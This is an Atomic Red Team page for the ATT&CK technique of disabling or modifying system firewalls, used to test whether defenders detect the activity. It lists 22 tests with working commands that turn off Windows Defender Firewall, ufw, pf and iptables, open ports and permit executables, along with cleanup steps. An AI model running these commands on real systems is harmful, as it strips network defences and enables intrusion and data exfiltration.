Try it using Invoke-Atomic

Impair Defenses: Disable or Modify System Firewall

Description from ATT&CK

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.

Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. Non-Standard Port).(Citation: change_rdp_port_conti)

Atomic Tests

Atomic Test #1 - Disable Microsoft Defender Firewall

Disables the Microsoft Defender Firewall for the current profile. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile…

Supported Platforms: windows

auto_generated_guid: 88d05800-a5e4-407e-9b53-ece4174f197f

Inputs:

None

Attack Commands: Run with command_prompt!

1
2

netsh advfirewall set currentprofile state off

Cleanup Commands:

1
2

netsh advfirewall set currentprofile state on >nul 2>&1

Atomic Test #2 - Disable Microsoft Defender Firewall via Registry

Disables the Microsoft Defender Firewall for the public profile via registry Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile…

Supported Platforms: windows

auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612

Inputs:

None

Attack Commands: Run with command_prompt!

1
2

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f

Cleanup Commands:

1
2

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f

Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall

Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services…

Supported Platforms: windows

auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1

Inputs:

None

Attack Commands: Run with command_prompt!

1
2
3

netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes

Cleanup Commands:

1
2

netsh advfirewall reset >nul 2>&1

Atomic Test #4 - Opening ports for proxy - HARDRAIN

This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying.

reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf

Supported Platforms: windows

auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80

Inputs:

None

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2

netsh advfirewall firewall add rule name="atomic testing" action=allow dir=in protocol=TCP localport=450

Cleanup Commands:

1

netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localport=450 >nul 2>&1

Atomic Test #5 - Open a local port through Windows Firewall to any profile

This test will attempt to open a local port defined by input arguments to any profile

Supported Platforms: windows

auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed

Inputs:

Name Description Type Default Value
local_port This is the local port you wish to test opening integer 3389

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1

netsh advfirewall firewall add rule name="Open Port to Any" dir=in protocol=tcp localport=#{local_port} action=allow profile=any

Cleanup Commands:

1

netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null

Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location

This test will attempt to allow an executable through the system firewall located in the Users directory

Supported Platforms: windows

auto_generated_guid: 6f5822d2-d38d-4f48-9bfc-916607ff6b8c

Inputs:

Name Description Type Default Value
exe_file_path path to exe file path PathToAtomicsFolder\T1562.004\bin\AtomicTest.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3

Copy-Item "#{exe_file_path}" -Destination "C:\Users\$env:UserName" -Force
netsh advfirewall firewall add rule name="Atomic Test" dir=in action=allow program="C:\Users\$env:UserName\AtomicTest.exe" enable=yes

Cleanup Commands:

1
2
3

netsh advfirewall firewall delete rule name="Atomic Test" | Out-Null
Remove-Item C:\Users\$env:UserName\AtomicTest.exe -ErrorAction Ignore

Atomic Test #7 - Stop/Start UFW firewall

Stop the Uncomplicated Firewall (UFW) if installed.

Supported Platforms: linux

auto_generated_guid: fe135572-edcd-49a2-afe6-1d39521c5a9a

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2

ufw disable

Cleanup Commands:

1
2
3

ufw enable
ufw status verbose

Dependencies: Run with sh!

Description: Check if ufw is installed on the machine.

Check Prereq Commands:

1
2
3

if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi

Get Prereq Commands:

1
2

echo ""

Atomic Test #8 - Stop/Start Packet Filter

Stop the Packet Filter if installed.

Supported Platforms: freebsd

auto_generated_guid: 0ca82ed1-0a94-4774-9a9a-a2c83a8022b7

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3

service pf stop
service pf disable

Cleanup Commands:

1
2
3
4

service pf enable
service pf start
service pf status

Dependencies: Run with sh!

Description: Check if pfctl is installed on the machine.

Check Prereq Commands:

1
2
3

if [ ! -x "$(command -v pfctl)" ]; then echo -e "\n***** PF NOT installed *****\n"; exit 1; fi
if [ "$(kldstat -n pf)" = "" ]; then echo -e "\n***** PF inactive *****\n"; exit 1; fi

Get Prereq Commands:

1
2

echo ""

Atomic Test #9 - Stop/Start UFW firewall systemctl

Stop the Uncomplicated Firewall (UFW) if installed, using systemctl.

Supported Platforms: linux

auto_generated_guid: 9fd99609-1854-4f3c-b47b-97d9a5972bd1

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2

systemctl stop ufw

Cleanup Commands:

1
2
3

systemctl start ufw
systemctl status ufw

Dependencies: Run with sh!

Description: Check if systemctl and ufw is installed on the machine.

Check Prereq Commands:

1
2
3
4

if [ ! -x "$(command -v systemctl)" ]; then echo -e "\n***** systemctl NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi

Get Prereq Commands:

1
2

echo ""

Atomic Test #10 - Turn off UFW logging

Turn off the Uncomplicated Firewall (UFW) logging.

Supported Platforms: linux

auto_generated_guid: 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2

ufw logging off

Cleanup Commands:

1
2
3

ufw logging low
ufw status verbose

Dependencies: Run with sh!

Description: Check if ufw is installed on the machine and enabled.

Check Prereq Commands:

1
2
3

if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi

Get Prereq Commands:

1
2

echo ""

Atomic Test #11 - Add and delete UFW firewall rules

Add and delete a rule on the Uncomplicated Firewall (UFW) if installed and enabled.

Supported Platforms: linux

auto_generated_guid: b2563a4e-c4b8-429c-8d47-d5bcb227ba7a

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3

ufw prepend deny from 1.2.3.4
ufw status numbered

Cleanup Commands:

1
2
3

{ echo y; echo response; } | ufw delete 1
ufw status numbered

Dependencies: Run with sh!

Description: Check if ufw is installed on the machine and enabled.

Check Prereq Commands:

1
2
3

if [ ! -x "$(command -v ufw)" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi
if echo "$(ufw status)" |grep -q "inactive"; then echo -e "\n***** ufw inactive *****\n"; exit 1; fi

Get Prereq Commands:

1
2

echo ""

Atomic Test #12 - Add and delete Packet Filter rules

Add and delete a rule on the Packet Filter (PF) if installed and enabled.

Supported Platforms: freebsd

auto_generated_guid: 8b23cae1-66c1-41c5-b79d-e095b6098b5b

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3

echo "block in proto tcp from 1.2.3.4 to any" | pfctl -a pf-rules -f -
pfctl -a pf-rules -s rules

Cleanup Commands:

1
2
3
4

pfctl -a pf-rules -F rules
sed -i "" '/anchor pf-rules/d'
pfctl -f /etc/pf.conf

Dependencies: Run with sh!

Description: Check if pf is installed on the machine and enabled.

Check Prereq Commands:

1
2
3

if [ ! -x "$(command -v pfctl)" ]; then echo -e "\n***** PF NOT installed *****\n"; exit 1; fi
if [ "$(kldstat -n pf)" = "" ]; then echo -e "\n***** PF inactive *****\n"; exit 1; fi

Get Prereq Commands:

1
2
3

echo "anchor pf-rules >> /etc/pf.conf"
pfctl -f /etc/pf.conf

Atomic Test #13 - Edit UFW firewall user.rules file

Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.

Supported Platforms: linux

auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3

echo "# THIS IS A COMMENT" >> /etc/ufw/user.rules
grep "# THIS IS A COMMENT" /etc/ufw/user.rules

Cleanup Commands:

1
2

sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/user.rules

Dependencies: Run with sh!

Description: Check if /etc/ufw/user.rules exists.

Check Prereq Commands:

1
2

if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi

Get Prereq Commands:

1
2

echo ""

Atomic Test #14 - Edit UFW firewall ufw.conf file

Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf which controls if the firewall starts on boot and its logging level.

Supported Platforms: linux

auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3

echo "# THIS IS A COMMENT" >> /etc/ufw/ufw.conf
grep "# THIS IS A COMMENT" /etc/ufw/ufw.conf

Cleanup Commands:

1
2
3

sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/ufw.conf
cat /etc/ufw/ufw.conf

Dependencies: Run with sh!

Description: Check if /etc/ufw/ufw.conf exists.

Check Prereq Commands:

1
2

if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi

Get Prereq Commands:

1
2

echo ""

Atomic Test #15 - Edit UFW firewall sysctl.conf file

Edit the Uncomplicated Firewall (UFW) configuration file for setting network variables /etc/ufw/sysctl.conf.

Supported Platforms: linux

auto_generated_guid: c4ae0701-88d3-4cd8-8bce-4801ed9f97e4

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3

echo "# THIS IS A COMMENT" >> /etc/ufw/sysctl.conf
grep "# THIS IS A COMMENT" /etc/ufw/sysctl.conf

Cleanup Commands:

1
2
3

sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/sysctl.conf
cat /etc/ufw/sysctl.conf

Dependencies: Run with sh!

Description: Check if /etc/ufw/sysctl.conf exists.

Check Prereq Commands:

1
2

if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi

Get Prereq Commands:

1
2

echo ""

Atomic Test #16 - Edit UFW firewall main configuration file

Edit the Uncomplicated Firewall (UFW) main configuration file for setting default policies /etc/default/ufw.

Supported Platforms: linux

auto_generated_guid: 7b697ece-8270-46b5-bbc7-6b9e27081831

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3

echo "# THIS IS A COMMENT" >> /etc/default/ufw
grep "# THIS IS A COMMENT" /etc/default/ufw

Cleanup Commands:

1
2

sed -i 's/# THIS IS A COMMENT//g' /etc/default/ufw

Dependencies: Run with sh!

Description: Check if /etc/default/ufw exists.

Check Prereq Commands:

1
2

if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw NOT installed *****\n"; exit 1; fi

Get Prereq Commands:

1
2

echo ""

Atomic Test #17 - Tail the UFW firewall log file

Print the last 10 lines of the Uncomplicated Firewall (UFW) log file /var/log/ufw.log.

Supported Platforms: linux

auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2

tail /var/log/ufw.log

Dependencies: Run with sh!

Description: Check if /var/log/ufw.log exists.

Check Prereq Commands:

1
2

if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw NOT logging *****\n"; exit 1; fi

Get Prereq Commands:

1
2

echo ""

Atomic Test #18 - Disable iptables

Some Linux systems may not activate ufw, but use iptables for firewall rules instead. (ufw works on top of iptables.) Attackers cannot directly disable iptables, as it is not implemented as a service like ufw. But they can flush all iptables rules, which in fact "disable" iptables.

Supported Platforms: linux

auto_generated_guid: 7784c64e-ed0b-4b65-bf63-c86db229fd56

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3

iptables-save > /tmp/iptables.rules
iptables -F

Cleanup Commands:

1
2

iptables-restore < /tmp/iptables.rules

Dependencies: Run with sh!

Description: Check if iptables is installed on the machine.

Check Prereq Commands:

1
2

if [ ! -x "$(command -v iptables)" ]; then echo -e "\n***** iptables NOT installed *****\n"; exit 1; fi

Get Prereq Commands:

1
2

echo ""

Atomic Test #19 - Modify/delete iptables firewall rules

Instead of completely "disabling" iptables, adversaries may choose to delete a certain rule, which, for example, blocks data exfiltration via ftp. By doing so, they may cause less noise to avoid detection.

Supported Platforms: linux

auto_generated_guid: 899a7fb5-d197-4951-8614-f19ac4a73ad4

Inputs:

None

Attack Commands: Run with sh! Elevation Required (e.g. root or admin)

1
2
3

iptables-save > /tmp/iptables.rules
iptables -D OUTPUT -p tcp --dport 21 -j DROP

Cleanup Commands:

1
2

iptables-restore < /tmp/iptables.rules

Dependencies: Run with sh!

Description: Check if iptables is installed on the machine.

Check Prereq Commands:

1
2
3

if [ ! -x "$(command -v iptables)" ]; then echo -e "\n***** iptables NOT installed *****\n"; exit 1; fi
if ! echo "$(iptables -L)" | grep -q "DROP .*dpt:ftp"; then echo -e "\n***** this firewall rule is NOT activated *****\n***** activate it by executing \"iptables -A OUTPUT -p tcp --dport 21 -j DROP\" *****\n"; exit 1; fi

Get Prereq Commands:

1
2

echo ""

Atomic Test #20 - LockBit Black - Unusual Windows firewall registry modification -cmd

An adversary tries to modify the windows firewall registry

Supported Platforms: windows

auto_generated_guid: a4651931-ebbb-4cde-9363-ddf3d66214cb

Inputs:

None

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2
3

reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f

Cleanup Commands:

1
2
3

reg delete "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /f >nul 2>&1

Atomic Test #21 - LockBit Black - Unusual Windows firewall registry modification -Powershell

An adversary tries to modify the windows firewall registry.

Supported Platforms: windows

auto_generated_guid: 80b453d1-eec5-4144-bf08-613a6c3ffe12

Inputs:

None

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

1
2
3

New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile" -Name EnableFirewall -PropertyType DWORD -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -PropertyType DWORD -Value 0 -Force

Cleanup Commands:

1
2
3

Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile"  -Name EnableFirewall -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile" -Name EnableFirewall -Force -ErrorAction Ignore

Atomic Test #22 - Blackbit - Disable Windows Firewall using netsh firewall

An adversary tries to modify the windows firewall configuration using the deprecated netsh firewall command (command still works).

Supported Platforms: windows

auto_generated_guid: 91f348e6-3760-4997-a93b-2ceee7f254ee

Inputs:

None

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

1
2

netsh firewall set opmode mode=disable

Cleanup Commands:

1
2

netsh firewall set opmode mode=enable >nul 2>&1

source